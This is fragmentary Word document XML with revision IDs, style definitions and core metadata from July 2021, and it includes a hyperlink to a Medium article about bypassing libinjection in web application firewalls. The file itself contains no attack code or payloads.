    <w:rsid w:val="00B077A6"/>
    <w:rsid w:val="00B860CF"/>
    <w:rsid w:val="00BB099F"/>
    <w:rsid w:val="00BC244A"/>
    <w:rsid w:val="00BC2D3C"/>
    <w:rsid w:val="00C05653"/>
    <w:rsid w:val="00C16477"/>
    <w:rsid w:val="00C614BF"/>
    <w:rsid w:val="00DB0ED5"/>
    <w:rsid w:val="00DD30E9"/>
    <w:rsid w:val="00DF2DA0"/>
    <w:rsid w:val="00E15A3F"/>
    <w:rsid w:val="00E954B0"/>
    <w:rsid w:val="00EB5B71"/>
    <w:rsid w:val="00EF3A23"/>
    <w:rsid w:val="00F16AC2"/>
    <w:rsid w:val="00F1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1E4F"/>
  <w15:docId w15:val="{3C9F3B4B-1E5C-4FF8-94C5-4219DAF9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9F"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00134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755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B09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7469557164006476411msolistparagraph">
    <w:name w:val="m_7469557164006476411msolistparagraph"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="0083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05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3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0znpp.medium.com/how-to-bypass-libinjection-in-many-waf-ngwaf-1e2513453c0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BVA/waf-br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1022D-1222-4AD2-A857-9FCAB6CD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dc:description/>
  <cp:lastModifiedBy>goran jakovljevic</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-14T09:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-15T08:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>